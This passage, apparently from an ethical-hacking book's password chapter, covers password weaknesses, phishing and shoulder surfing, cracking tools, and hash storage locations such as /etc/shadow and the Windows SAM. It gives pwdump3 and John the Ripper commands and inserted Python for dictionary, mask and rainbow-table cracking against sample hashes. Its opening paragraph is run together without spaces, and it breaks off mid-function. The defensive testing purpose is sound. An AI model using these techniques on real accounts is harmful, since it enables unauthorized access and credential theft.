Requirealllaptopstousefulldiskencryptiontechnologies,suchasBitLockerinWindows(ideallycombinedwithitscentralmanagementsoftwarecalledMicrosoftBitLockerAdministrationandMonitoringthatcanbefoundathttps://technet.microsoft.com/en-us/windows/hh826072.aspx)andWinMagicSecureDocFullDiskEncryption(www.winmagic.com/products/securedoc-full-disk-encryption).Keepserverroomsandwiringclosetslockedandmonitorthoseareasforanywrongdoing.Keepacurrentinventoryofhardwareandsoftwarewithintheorganizationsoit’seasytodeterminewhenextraequipmentappearsorwhenequipmentismissing.Thisisespeciallyimportantincomputerrooms.Properlysecurecomputermediawhenstoredandduringtransport.Scanforroguewirelessaccesspoints.Usecabletrapsandlocksthatpreventintrudersfromunpluggingnetworkcablesfrompatchpanelsorcomputersandusingthoseconnectionsfortheirowncomputers.Useabulkeraseronmagneticmediabeforethey’rediscarded.

Chapter 8

Passwords

In This Chapter

Identifying password vulnerabilities

Examining password-hacking tools and techniques

Hacking operating system passwords

Hacking password-protected files

Protecting your systems from password hacking

Password hacking is one of the easiest and most common ways attackers obtain unauthorized network, computer, or application access. You often hear about it in the headlines, and study after study, such as the Verizon Data Breach Investigations Report, reaffirms that weak passwords are at the root of many security problems. I have trouble wrapping my head around the fact that I'm still talking about (and businesses are suffering from) weak passwords, but it's a reality, and, as an information security testing professional, you can certainly do your part to minimize the risks.

Although strong passwords (ideally, longer and stronger passphrases that are difficult to crack or guess) are easy to create and maintain, network administrators and users often neglect this. Therefore, passwords are one of the weakest links in the information security chain. Passwords rely on secrecy. After a password is compromised, its original owner isn't the only person who can access the system with it. That's when accountability goes out the window and bad things start happening.

External attackers and malicious insiders have many ways to obtain passwords. They can glean passwords simply by asking for them or by looking over the shoulders of users (shoulder surfing) while they type their passwords. Hackers can also obtain passwords from local computers by using password-cracking software. To obtain passwords from across a network, attackers can use remote cracking utilities, keyloggers, or network analyzers.

This chapter demonstrates how easily the bad guys can gather password information from your network and computer systems. I outline common password vulnerabilities and describe countermeasures to help prevent these vulnerabilities from being exploited on your systems. If you perform the tests and implement the countermeasures outlined in this chapter, you'll be well on your way to securing your systems' passwords.

Understanding Password Vulnerabilities

When you balance the cost of security and the value of the protected information, the combination of a user ID and a secret password is usually adequate. However, passwords give a false sense of security. The bad guys know this and attempt to crack passwords as a step toward breaking into computer systems.

One big problem with relying solely on passwords for security is that more than one person can know them. Sometimes, this is intentional; often, it's not. The tough part is that there's no way of knowing who, besides the password's owner, knows a password.

Remember that knowing a password doesn't make someone an authorized user.

Here are the two general types of password vulnerabilities:

Organizational or user vulnerabilities: This includes lack of password policies that are enforced within the organization and lack of security awareness on the part of users.

Technical vulnerabilities: This includes weak encryption methods and unsecure storage of passwords on computer systems.

I explore each of these classifications in more detail in the following sections.

Before computer networks and the Internet, the user's physical environment was an additional layer of password security that actually worked pretty well. Now that most computers have network connectivity, that protection is gone. Refer to Chapter 7 for details on managing physical security in this age of networked computers and mobile devices.

Organizational password vulnerabilities

It's human nature to want convenience, especially when it comes to remembering five, ten, and often dozens of passwords for work and daily life. This desire for convenience makes passwords one of the easiest barriers for an attacker to overcome. Almost 3 trillion (yes, trillion with a t and 12 zeros) eight-character password combinations are possible by using the 26 letters of the alphabet and the numerals 0 through 9. The keys to strong passwords are: 1) easy to remember and 2) difficult to crack. However, most people just focus on the easy-to-remember part. Users like to use such passwords as password, their login name, abc123, or no password at all! Don't laugh; I've seen these blatant weaknesses and guarantee they're on any given network this very moment.

Unless users are educated and reminded about using strong passwords, their passwords usually are

Easy to guess.

Seldom changed.

Reused for many security points. When bad guys crack one password, they can often access other systems with that same password and username.

Using the same password across multiple systems and websites is nothing but a breach waiting to happen. Everyone is guilty of it, but that doesn't make it right. Do what you can to protect your own credentials and spread the word to your users about how this practice can get you into a real bind.

Written down in unsecure places. Generally, the more complex a password is, the more difficult it is to crack. However, when users create complex passwords, they're more likely to write them down. External attackers and malicious insiders can find these passwords and use them against you and your business.

Technical password vulnerabilities

You can often find these serious technical vulnerabilities after exploiting organizational password vulnerabilities:

Weak password encryption schemes. Hackers can break weak password storage mechanisms by using cracking methods that I outline in this chapter. Many vendors and developers believe that passwords are safe as long as they don't publish the source code for their encryption algorithms. Wrong! A persistent, patient attacker can usually crack this security by obscurity (a security measure that's hidden from plain view but can be easily overcome) fairly quickly. After the code is cracked, it is distributed across the Internet and becomes public knowledge.

Password cracking utilities take advantage of weak password encryption. These utilities do the grunt work and can crack any password, given enough time and computing power.

Programs that store their passwords in memory, unsecured files, and easily accessed databases.

Unencrypted databases that provide direct access to sensitive information to anyone with database access, regardless of whether they have a business need to know.

User applications that display passwords on the screen while the user is typing.

The National Vulnerability Database (an index of computer vulnerabilities managed by the National Institute of Standards and Technology) currently identifies over 2,300 password-related vulnerabilities! You can search for these issues at http://nvd.nist.gov to find out how vulnerable some of your systems are from a technical perspective.

Cracking Passwords

Password cracking is one of the most enjoyable hacks for the bad guys. It fuels their sense of exploration and desire to figure out a problem. You might not have a burning desire to explore everyone's passwords, but it helps to approach password cracking with this mindset. So where should you start testing the passwords on your systems? Generally, any user's password works. After you obtain one password, you can often obtain others, including administrator or root passwords.

Administrator passwords are the pot of gold. With unauthorized administrative access, you (or a criminal hacker) can do virtually anything on the system. When looking for your organization's password vulnerabilities, I recommend first trying to obtain the highest level of access possible (such as administrator) through the most discreet method possible. That's often what the criminals do.

You can use low-tech ways and high-tech ways to exploit vulnerabilities to obtain passwords. For example, you can deceive users into divulging passwords over the telephone or simply observe what a user has written down on a piece of paper. Or you can capture passwords directly from a computer, over a network, and via the Internet with the tools covered in the following sections.

Cracking passwords the old-fashioned way

A hacker can use low-tech methods to crack passwords. These methods include using social engineering techniques such as phishing, shoulder surfing, and simply guessing passwords from information that he knows about the user.

Social engineering

The most popular low-tech method for gathering passwords is social engineering, which I cover in detail in Chapter 6. Social engineering takes advantage of the trusting nature of human beings to gain information that later can be used maliciously. A common social engineering technique is simply to con people into divulging their passwords. It sounds ridiculous, but it happens all the time.

Techniques

To obtain a password through social engineering, you just ask for it. For example, you can simply call a user and tell him that he has some important-looking e-mails stuck in the mail queue, and you need his password to log in and free them up. This is often how hackers and rogue insiders try to get the information!

Another way to get users to divulge their passwords is to send a phishing e-mail simply requesting that information. I have found that asking users to confirm their understanding and compliance with internal security policies by submitting their login credentials to a phishing website is all it takes. I cover e-mail phishing in greater detail in Chapter 6.

If users give you their passwords during your testing, make sure that those passwords are changed. An easy way to do this is to force password changes for all users through the Windows domain. You don't want to be held accountable if something goes awry after the password has been disclosed.

A common weakness that can facilitate such social engineering is when staff members' names, phone numbers, and e-mail addresses are posted on your company website. Social media sites such as LinkedIn, Facebook, and Twitter can also be used against a company because these sites can reveal employees' names and contact information.

Countermeasures

User awareness and consistent security training are great defenses against social engineering. Security tools are a good fail-safe if they monitor for such e-mails and web browsing at the host level, network perimeter, or in the cloud. Train users to spot attacks (such as suspicious phone calls or deceitful phishing e-mails) and respond effectively. Their best response is not to give out any information and to alert the appropriate information security manager in the organization to see whether the inquiry is legitimate and whether a response is necessary. Oh, and take that staff directory off your website, or at least remove IT staff members' information.

Shoulder surfing

Shoulder surfing (the act of looking over someone's shoulder to see what the person is typing) is an effective, low-tech password hack.

Techniques

To mount this attack, the bad guys must be near their victims and not look obvious. They simply collect the password by watching either the user's keyboard or screen when the person logs in. An attacker with a good eye might even watch whether the user is glancing around his desk for either a reminder of the password or the password itself. Security cameras or a webcam can even be used for such attacks. Coffee shops and airplanes provide the ideal scenarios for shoulder surfing.

You can try shoulder surfing yourself. Simply walk around the office and perform random spot checks. Go to users' desks and ask them to log in to their computers, the network, or even their e-mail applications. Just don't tell them what you're doing beforehand, or they might attempt to hide what they're typing or where they're looking for their password, two things that they should've been doing all along! Just be careful doing this and respect other people's privacy.

Countermeasures

Encourage users to be aware of their surroundings and not to enter their passwords when they suspect that someone is looking over their shoulders. Instruct users that if they suspect someone is looking over their shoulders while they're logging in, they should politely ask the person to look away or, when necessary, hurl an appropriate epithet to show the offender that the user is serious. It's often easiest to just lean into the shoulder surfer's line of sight to keep them from seeing any typing and/or the computer screen. 3M Privacy Filters (www.shop3m.com/3m-privacy-filters.html) work great as well, yet, surprisingly, I rarely see them being used.

Inference

Inference is simply guessing passwords from information you know about users, such as their date of birth, favorite television show, or phone numbers. It sounds silly, but criminals often determine their victims' passwords simply by guessing them!

The best defense against an inference attack is to educate users about creating secure passwords that don't include information that can be associated with them. Outside of certain password complexity filters, it's often not easy to enforce this practice with technical controls. So, you need a sound security policy and ongoing security awareness and training to remind users of the importance of secure password creation.

Weak authentication

External attackers and malicious insiders can obtain, or simply avoid having to use, passwords by taking advantage of older or unsecured operating systems that don't require passwords to log in. The same goes for a phone or tablet that isn't configured to use passwords.

Bypassingauthentication

On older operating systems (such as Windows 9x) that prompt for a password, you can press Esc on the keyboard to get right in. Okay, it's hard to find any Windows 9x systems these days, but the same goes for any operating system, old or new, that's configured to bypass the login screen. After you're in, you can find other passwords stored in such places as dialup and VPN connections and screensavers. Such passwords can be cracked very easily using ElcomSoft's Proactive System Password Recovery tool (www.elcomsoft.com/pspr.html) and Cain & Abel (www.oxid.it/cain.html). These weak systems can serve as trusted machines (meaning that people assume they're secure) and provide good launching pads for network-based password attacks as well.

Countermeasures

The only true defense against weak authentication is to ensure your operating systems require a password upon boot. To eliminate this vulnerability, at least upgrade to Windows 7, if not Windows 10, or use the most recent versions of Linux or one of the various flavors of UNIX, including Mac OS X and Chrome OS.

Current authentication systems, such as Kerberos (which is used in newer versions of Windows) and directory services (such as Microsoft's Active Directory), encrypt user passwords or don't communicate the passwords across the network at all, which creates an extra layer of security.

Cracking passwords with high-tech tools

High-tech password cracking involves using a program that tries to guess a password by determining all possible password combinations. These high-tech methods are mostly automated after you access the computer and password database files.

The main password-cracking methods are dictionary attacks, brute-force attacks, and rainbow attacks. You find out how each of these works in the following sections.

Password-cracking software

You can try to crack your organization's operating system and application passwords with various password-cracking tools:

Brutus (www.hoobie.net/brutus) cracks logons for HTTP, FTP, telnet, and more.

Cain & Abel (www.oxid.it/cain.html) cracks LM and NT LAN Manager (NTLM) hashes, Windows RDP passwords, Cisco IOS and PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are cryptographic representations of passwords.)

ElcomSoft Distributed Password Recovery (www.elcomsoft.com/edpr.html) cracks Windows, Microsoft Office, PGP, Adobe, iTunes, and numerous other passwords in a distributed fashion using up to 10,000 networked computers at one time. Plus, this tool uses the same graphics processing unit (GPU) video acceleration as the ElcomSoft Wireless Auditor tool, which allows for cracking speeds up to 50 times faster. (I talk about the ElcomSoft Wireless Auditor tool in Chapter 10.)

ElcomSoft System Recovery (www.elcomsoft.com/esr.html) cracks or resets Windows user passwords, sets administrative rights, and resets password expirations, all from a bootable CD. This is a great tool for demonstrating what can happen when laptop computers do not have full disk encryption.

John the Ripper (www.openwall.com/john) cracks hashed Linux/UNIX and Windows passwords.

ophcrack (http://ophcrack.sourceforge.net) cracks Windows user passwords using rainbow tables from a bootable CD. Rainbow tables are pre-calculated password hashes that can help speed up the cracking process by comparing these hashes with the hashes obtained from the specific passwords being tested.

Proactive Password Auditor (www.elcomsoft.com/ppa.html) runs brute-force, dictionary, and rainbow cracks against extracted LM and NTLM password hashes.

Proactive System Password Recovery (www.elcomsoft.com/pspr.html) recovers practically any locally stored Windows password, such as logon passwords, WEP/WPA passphrases, SYSKEY passwords, and RAS/dialup/VPN passwords.

pwdump3 (www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7) extracts Windows password hashes from the SAM (Security Accounts Manager) database.

RainbowCrack (http://project-rainbowcrack.com) cracks LAN Manager (LM) and MD5 hashes very quickly by using rainbow tables.

THC-Hydra (www.thc.org/thc-hydra) cracks logons for HTTP, FTP, IMAP, SMTP, VNC, and many more.

Some of these tools require physical access to the systems you're testing. You might be wondering what value that adds to password cracking. If a hacker can obtain physical access to your systems and password files, you have more than just basic information security problems to worry about, right? True, but this kind of access is entirely possible! What about a summer intern, a disgruntled employee, or an outside auditor with malicious intent? The mere risk of an unencrypted laptop being lost or stolen and falling into the hands of someone with ill intent should be reason enough.

To understand how the preceding password-cracking programs generally work, you first need to understand how passwords are stored. Passwords are typically not stored in the clear: they're run through a one-way hash algorithm, such as SHA-2 or MD5 (or, on Windows, the LM and NT hash functions), and only the resulting hash is kept. A hash is a fixed-length string, and with a given algorithm the same password always produces exactly the same hash. Hashes are irreversible for all practical purposes, so, in theory, passwords can never be decrypted; they can only be guessed, with each guess hashed and compared. Furthermore, certain password stores, such as the /etc/shadow file on Linux, add a random value called a salt to each password before hashing it. This prevents the same password used by two people from having the same hash value and forces an attacker to work on each account separately. LM and NT hashes are not salted, which is one reason Windows hashes fall so quickly to the rainbow attacks described later in this chapter.

Password-cracking utilities take a set of known passwords and run them through the same password-hashing algorithm. The resulting hashes are then compared at lightning speed to the password hashes extracted from the original password database. When a match is found between the newly generated hash and the hash in the original database, the password has been cracked. It's that simple.

Other password-cracking programs simply attempt to log on using a predefined set of user IDs and passwords. This is how many dictionary-based cracking tools work, such as Brutus (www.hoobie.net/brutus) and SQLPing3 (www.sqlsecurity.com/downloads). I cover cracking web application and database passwords in Chapters 15 and 16.

Passwords that are subjected to cracking tools eventually lose. You have access to the same tools as the bad guys. These tools can be used for both legitimate security assessments and malicious attacks. You want to find password weaknesses before the bad guys do, and in this section, I show you some of my favorite methods for assessing Windows and Linux/UNIX passwords.

When trying to crack passwords online (that is, by attempting actual logons, as Brutus and THC-Hydra do), the associated user accounts might be locked out, which could interrupt your users. Be careful if intruder lockout is enabled in your operating systems, databases, or applications. If lockout is enabled, you might lock out some or all computer/network accounts, resulting in a denial of service situation for your users. Offline cracking of extracted hashes never touches the live accounts and carries no such risk.

Password storage locations vary by operating system:

Windows usually stores passwords in these locations:

Security Accounts Manager (SAM) database (c:\windows\system32\config)

Active Directory database file that's stored locally or spread across domain controllers (ntds.dit)

Windows may also store passwords in a backup of the SAM file in the c:\winnt\repair or c:\windows\repair directory.

Some Windows applications store passwords in the Registry or as plain-text files on the hard drive! A simple registry or file-system search for "password" may uncover just what you're looking for.

Linux and other UNIX variants typically store passwords in these files:

/etc/passwd (readable by everyone)

/etc/shadow (accessible by the system and the root account only)

/etc/security/passwd (accessible by the system and the root account only)

/.secure/etc/passwd (accessible by the system and the root account only)

Dictionary attacks

Dictionary attacks quickly compare a set of known dictionary-type words, including many common passwords, against a password database. The dictionary itself is a text file with hundreds if not thousands of words, typically listed one per line in alphabetical order. For instance, suppose that you have a dictionary file that you downloaded from one of the sites in the following list. The English dictionary file at the Purdue site contains one word per line, starting with 10th, 1st... all the way to zygote.

Many password-cracking utilities can use a separate dictionary that you create or download from the Internet. Here are some popular sites that house dictionary files and other miscellaneous word lists:

ftp://ftp.cerias.purdue.edu/pub/dict

www.outpost9.com/files/WordLists.html

Don't forget to use other language files as well, such as Spanish and Klingon.

Dictionary attacks are only as good as the dictionary files you supply to your password-cracking program. You can easily spend days, even weeks, trying to crack passwords with a dictionary attack. If you don't set a time limit or similar expectation going in, you'll likely find that dictionary cracking is often a mere exercise in futility. Most dictionary attacks are good for weak (easily guessed) passwords. However, some special dictionaries have common misspellings or alternative spellings of words, such as pa$$w0rd (password) and 5ecur1ty (security). Additionally, special dictionaries can contain non-English words and thematic words from religions, politics, or Star Trek. Modern crackers also generate such variants on the fly from a plain wordlist by applying mangling rules (John the Ripper's --rules option and hashcat's rule files), so the dictionary doesn't have to hold every leetspeak spelling and every year suffix.
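The following is an added example, not code from the book or from any of the tools it names, showing how the hash-and-compare loop described above works and how a dictionary attack with mangling rules reaches spellings such as pa$$w0rd and Summer2016 from plain words. The credential store format (user:hex for unsalted MD5, user:$salt$hex for salted SHA-256), the accounts, salts, and wordlist are all constructed for the example; only the MD5 of "password" is a real, well-known value. It also shows why a salt matters: the unsalted accounts cost one hash per candidate for all of them together, while each salted account has to be hashed separately.

```python
import hashlib

# Added example, not code from the book. The credential store layout, accounts,
# salts and wordlist below are constructed for illustration.


def md5_hex(password):
    """Unsalted MD5, the way many weak application stores hash passwords."""
    return hashlib.md5(password.encode()).hexdigest()


def salted_sha256_hex(salt, password):
    """Salted SHA-256: the salt is prepended before hashing."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed sample store. The MD5 for "password" is the well-known value;
# the other entries are generated here so the example is self-contained.
SAMPLE_STORE = "\n".join([
    "alice:5f4dcc3b5aa765d61d8327deb882cf99",                # md5("password")
    "bob:" + md5_hex("pa$$w0rd"),                            # leetspeak variant
    "carol:$k9Q2$" + salted_sha256_hex("k9Q2", "Summer2016"),
    "dave:$x7Lp$" + salted_sha256_hex("x7Lp", "Summer2016"),  # same password as carol, different salt
    "erin:$zz11$" + salted_sha256_hex("zz11", "Tr0ub4dor&3"),  # not derivable from the wordlist
])

# Constructed wordlist standing in for a downloaded dictionary file.
WORDLIST = ["password", "letmein", "summer", "qwerty", "security"]

# Mangling rules of the kind John the Ripper and hashcat apply on the fly.
LEET_TABLES = ({"s": "$", "o": "0"}, {"s": "5", "i": "1", "e": "3", "a": "4"})
SUFFIXES = ("", "1", "123", "!", "2016")


def mangle(word):
    """Yield the candidate passwords derived from one dictionary word."""
    bases = {word, word.capitalize(), word.upper()}
    for table in LEET_TABLES:
        bases.add("".join(table.get(c, c) for c in word))
    for base in sorted(bases):
        for suffix in SUFFIXES:
            yield base + suffix


def parse_store(text):
    """Return (user, salt_or_None, hex_digest) for each non-empty line."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rest = line.split(":", 1)
        if rest.startswith("$"):
            _, salt, digest = rest.split("$")
            entries.append((user, salt, digest))
        else:
            entries.append((user, None, rest))
    return entries


def crack(store_text, wordlist):
    """Dictionary attack with mangling. Returns ({user: password}, hashes_computed)."""
    entries = parse_store(store_text)
    unsalted = {}
    for user, salt, digest in entries:
        if salt is None:
            unsalted.setdefault(digest, []).append(user)
    salted = [e for e in entries if e[1] is not None]
    found, hashes = {}, 0
    for word in wordlist:
        for candidate in mangle(word):
            # Unsalted store: one hash of the candidate is checked against every
            # account at once, so accounts sharing a password fall together.
            d = md5_hex(candidate)
            hashes += 1
            for user in unsalted.get(d, []):
                found[user] = candidate
            # Salted store: each account needs its own hash of salt+candidate.
            # That per-account work is exactly what the salt buys the defender.
            for suser, salt, sdigest in salted:
                hashes += 1
                if salted_sha256_hex(salt, candidate) == sdigest:
                    found[suser] = candidate
    return found, hashes


if __name__ == "__main__":
    found, hashes = crack(SAMPLE_STORE, WORDLIST)
    print(f"{hashes} hashes computed; cracked: {found}")
```

Note that carol and dave share a password but have different stored hashes because of the salt, so neither cracks "for free" once the other does, whereas every unsalted MD5 account with that password would have matched on the same single hash. Erin's password never appears because no rule derives it from the five words; that's the "only as good as your dictionary" limit in action.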

Brute-force attacks

Brute-force attacks can crack practically any password, given sufficient time. Brute-force attacks try every combination of numbers, letters, and special characters until the password is discovered. Many password-cracking utilities let you specify such testing criteria as the character sets, password length to try, and known characters (for a "mask" attack). Sample Proactive Password Auditor brute-force password-cracking options are shown in Figure 8-1.

Figure 8-1: Brute-force password-cracking options in Proactive Password Auditor.

A brute-force test can take quite a while, depending on the number of accounts, their associated password complexities, and the speed of the computer that's running the cracking software. As powerful as brute-force testing can be, it literally can take forever to exhaust all possible password combinations, which in reality is not practical in every situation.

Smart hackers attempt logins slowly or at random times so the failed login attempts aren't as predictable or obvious in the system log files. Some malicious users might even call the IT help desk to attempt a reset of the account they just locked out. This social engineering technique could be a major issue, especially if the organization has no (or minimal) mechanisms in place to verify that locked-out users are who they say they are.

Can an expiring password deter a hacker's attack and render password cracking software useless? Partly. Changing a password doesn't stop an attacker who already holds the hash from cracking it, but it does mean that a password cracked after the change is worthless, so a short enough change interval limits the window in which a cracked password is useful. This is one reason why it's a good idea to change passwords periodically. Still, I'm not a big fan of forcing users to change their passwords often. Shortening the change interval can reduce the risk of passwords being cracked but can also be politically unfavorable in your business and end up creating the opposite effect you're going for, as users fall back on predictable variations of the old password. You have to strike a balance between security, convenience, and usability. In many situations, I don't think it's unreasonable to require password changes every 6 to 12 months or after a suspected compromise.

Exhaustive password cracking attempts usually aren't necessary. Most passwords are fairly weak. Even minimum password requirements, such as a password length, can help you in your testing. You might be able to discover security policy information by using other tools or via your web browser. (See Part IV for tools and techniques for testing the security of operating systems. See Chapter 15 for information on testing websites/applications.) If you find this password policy information, you can configure your cracking programs with more well-defined cracking parameters, which often generate faster results.
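As an added example (not code from the book or from Proactive Password Auditor), here is a mask-style brute-force attack of the kind described above, together with a keyspace calculator that shows how much a known password policy shrinks the search. The mask syntax follows the hashcat convention (?l lowercase, ?u uppercase, ?d digit, ?s punctuation and space, ?a all 95 printable characters); the target hash and the 1e9 hashes-per-second rate used in the time estimate are constructed/assumed values.

```python
import hashlib
import itertools
import string

# Added example, not code from the book. Mask tokens follow the hashcat
# convention; the target hash and the hash rate are constructed/assumed.

CHARSETS = {
    "l": string.ascii_lowercase,      # 26
    "u": string.ascii_uppercase,      # 26
    "d": string.digits,               # 10
    "s": string.punctuation + " ",    # 33
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]  # 95


def md5_digest(text):
    """Unsalted MD5 of a candidate; stands in for whatever hash the target uses."""
    return hashlib.md5(text.encode()).digest()


def parse_mask(mask):
    """Turn '?u?l?l?d?d' into a list of per-position character sets."""
    if len(mask) % 2 or any(mask[i] != "?" for i in range(0, len(mask), 2)):
        raise ValueError("mask must be a sequence of ?x tokens")
    return [CHARSETS[mask[i + 1]] for i in range(0, len(mask), 2)]


def keyspace(mask):
    """Number of candidates the mask generates (product of per-position set sizes)."""
    n = 1
    for charset in parse_mask(mask):
        n *= len(charset)
    return n


def estimate_seconds(mask, hashes_per_second):
    """Worst-case time to exhaust the mask at the given (assumed) hash rate."""
    return keyspace(mask) / hashes_per_second


def mask_attack(target_digest, mask, hash_fn=md5_digest):
    """Try every candidate the mask allows; return the password or None.
    A candidate outside the mask (wrong case, wrong length) is never tried,
    which is the price of narrowing the search."""
    for chars in itertools.product(*parse_mask(mask)):
        candidate = "".join(chars)
        if hash_fn(candidate) == target_digest:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed target: the unsalted MD5 of a password that fits the mask.
    print(mask_attack(md5_digest("pw42"), "?l?l?d?d"))
    # A policy of "one capital, six lowercase, two digits" versus nine
    # unconstrained printable characters, at an assumed 1e9 hashes/second.
    for m in ("?a?a?a?a?a?a?a?a?a", "?u?l?l?l?l?l?l?d?d"):
        print(m, keyspace(m), f"{estimate_seconds(m, 1e9):.0f} s")
```

With a policy that says "starts with a capital, six lowercase letters, two digits", the nine-character search drops from 95^9 (about 6.3e17 candidates, roughly twenty years at 1e9 hashes per second) to 26^7 times 100 (about 8e11, under a quarter of an hour at the same rate), which is the point of feeding discovered policy information into the cracker.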

Rainbow attacks

A rainbow password attack uses precomputed rainbow tables to crack various password hashes for LM, NTLM, Cisco PIX, and MD5 much more quickly and with extremely high success rates (near 100 percent for LM). Password cracking speed is increased in a rainbow attack because the hashes are precalculated and thus don't have to be generated individually on the fly as they are with dictionary and brute-force cracking methods. The catch is that rainbow tables work only against unsalted hashes: a salt changes the hash for every account, so a separate table would be needed for every salt value, which defeats the purpose.

Unlike dictionary and brute-force attacks, rainbow attacks cannot be used to crack password hashes of unlimited length; a table covers only the character set and lengths it was generated for. Microsoft LM hashes are at most 14 characters (stored as two independent 7-character halves, which is why they fall so quickly), and the ophcrack tables for Windows Vista and 7 hashes (also known as NT hashes) go up to around 16 characters for their dictionary-based sets. The rainbow tables are available for purchase and download via the ophcrack site at http://ophcrack.sourceforge.net. There's a length limitation because it takes significant time and storage to generate these rainbow tables. Given enough time, a sufficient number of tables will be created. Of course, by then, computers and applications likely have different authentication mechanisms and hashing standards, including a new set of vulnerabilities, to contend with. Job security for IT professionals working in this area never ceases to grow.

If you have a good set of rainbow tables, such as those offered via the ophcrack site and Project RainbowCrack (http://project-rainbowcrack.com), you can crack passwords in seconds, minutes, or hours versus the days, weeks, or even years required by dictionary and brute-force methods.
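To make the "precalculated hashes" idea concrete, here is an added example (not code from the book, ophcrack, or RainbowCrack) of a miniature rainbow table in the style of Oechslin's time-memory trade-off: chains of hash-then-reduce steps are computed once, only their start and end points are stored, and a lookup walks the target hash forward to see which stored chain it sits in. The keyspace (four lowercase letters, unsalted MD5), the chain count, and the chain length are constructed values chosen so the example runs in well under a second; real tables cover much longer masks and run to gigabytes. The example also shows why a salt defeats the table: a hash of salt plus password simply isn't in it.

```python
import hashlib

# Added example, not code from the book. Keyspace, chain count and chain
# length are constructed for speed, not coverage.

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 4
KEYSPACE = len(CHARSET) ** PW_LEN   # 456,976 candidate passwords


def h(password):
    """The unsalted hash the table is built for."""
    return hashlib.md5(password.encode()).digest()


def salted_h(salt, password):
    """A salted variant, used only to show that the table does not cover it."""
    return hashlib.md5((salt + password).encode()).digest()


def index_to_password(n):
    """Map an integer in [0, KEYSPACE) to a password (least significant char first)."""
    out = []
    for _ in range(PW_LEN):
        out.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(out)


def reduce_(digest, column):
    """Reduction function: fold a digest back into the password space.
    Mixing in the column number gives every column its own reduction, which
    is what makes this a rainbow table rather than a classic Hellman table
    and keeps chains that collide in different columns from merging."""
    return index_to_password((int.from_bytes(digest[:8], "big") + column) % KEYSPACE)


def walk(password, steps, start_column=0):
    """Advance `steps` links along a chain: p -> R_column(H(p))."""
    for column in range(start_column, start_column + steps):
        password = reduce_(h(password), column)
    return password


def build_table(chain_count, chain_len):
    """Precompute chains and keep only endpoint -> [start points].
    Storing endpoints alone is the memory saving. Real tools discard chains
    that merge ("perfect" tables); merged chains are kept in a list here so
    lookups stay correct for the demonstration."""
    table = {}
    for i in range(chain_count):
        start = index_to_password((i * 7919) % KEYSPACE)   # deterministic spread of starts
        table.setdefault(walk(start, chain_len), []).append(start)
    return table


def lookup(table, target_digest, chain_len):
    """Assume the target sits in column c, finish the chain from there, and if
    the endpoint is known, regenerate that chain to recover the preimage."""
    for column in range(chain_len - 1, -1, -1):
        end = walk(reduce_(target_digest, column), chain_len - column - 1, column + 1)
        for start in table.get(end, []):          # may be a false alarm; regeneration checks
            password = start
            for col in range(chain_len):
                if h(password) == target_digest:
                    return password
                password = reduce_(h(password), col)
    return None


if __name__ == "__main__":
    table = build_table(chain_count=1000, chain_len=100)
    secret = walk(index_to_password(5 * 7919 % KEYSPACE), 17)   # a password the table covers
    print("unsalted:", lookup(table, h(secret), 100))
    print("salted:  ", lookup(table, salted_h("s1", secret), 100))
```

A lookup costs on the order of chain_len squared over two hash operations instead of the full keyspace, and the table stores 1,000 endpoints for 100,000 hashes computed. Coverage is probabilistic (a password lands in the table only if some chain passes through it), which is why real tables are generated with far more chains and then pruned, and why the tables the book points to are limited to a fixed character set and length.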

Cracking Windows passwords with pwdump3 and John the Ripper

The following steps use two of my favorite utilities to test the security of current passwords on Windows systems:

pwdump3 (to extract password hashes from the Windows SAM database)

John the Ripper (to crack the hashes of Windows and Linux/UNIX passwords)

The following test requires administrative access to either your Windows standalone workstation or the server:

1. Create a new directory called passwords from the root of your Windows C: drive.

2. Download and install a decompression tool if you don't already have one.

WinZip (www.winzip.com) is a good commercial tool I use, and 7-Zip (www.7-zip.org) is a free decompression tool. Windows also includes built-in Zip file handling, albeit a bit kludgy.

3. Download, extract, and install the following software into the passwords directory you created, if you don't already have it on your system:

pwdump3: Download the file from www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7.

John the Ripper: Download the file from www.openwall.com/john.

4. Enter the following command to run pwdump3 and redirect its output to a file called cracked.txt:

c:\passwords\pwdump3 > cracked.txt

This file captures the Windows SAM password hashes, which you crack with John the Ripper in the next step. Figure 8-2 shows the contents of the cracked.txt file that contains the local Windows SAM database password hashes.

5. Enter the following command to run John the Ripper against the Windows SAM password hashes to display the cracked passwords:

c:\passwords\john cracked.txt

This process, shown in Figure 8-3, can take seconds or days, depending on the number of users and the complexity of their associated passwords. My Windows example took only five seconds to crack five weak passwords. John auto-detects the pwdump format and tries the LM hashes first; on systems where LM hash storage is disabled (so every LM field is the empty-password constant), point it at the NT hashes explicitly with --format=NT, which is available in the community-enhanced (jumbo) build.

Figure 8-2: Output from pwdump3.

Figure 8-3: Cracked password file hashes using John the Ripper.
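Before handing a dump like the one in Figure 8-2 to John, it pays to triage it, because the format itself tells you a lot. This added example (not code from the book, pwdump3, or John) parses pwdump-style lines (user:RID:LM hash:NT hash:::) and flags what a tester wants to know first. The account lines are constructed; the two constants are the real LM and NT hashes of the empty password, while the other NT values are placeholder hex, not hashes of any particular password.

```python
# Added example, not code from the book. The pwdump-style account lines are
# constructed; EMPTY_LM and EMPTY_NT are the real hashes of the empty string,
# every other hash value is placeholder hex.

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of ""; also what appears when LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
kbeaver:1001:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
svc_backup:1002:22222222222222222222222222222222:33333333333333333333333333333333:::
helpdesk:1003:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""


def parse_pwdump(text):
    """Return (user, rid, lm_hash, nt_hash) tuples, skipping malformed lines."""
    accounts = []
    for line in text.splitlines():
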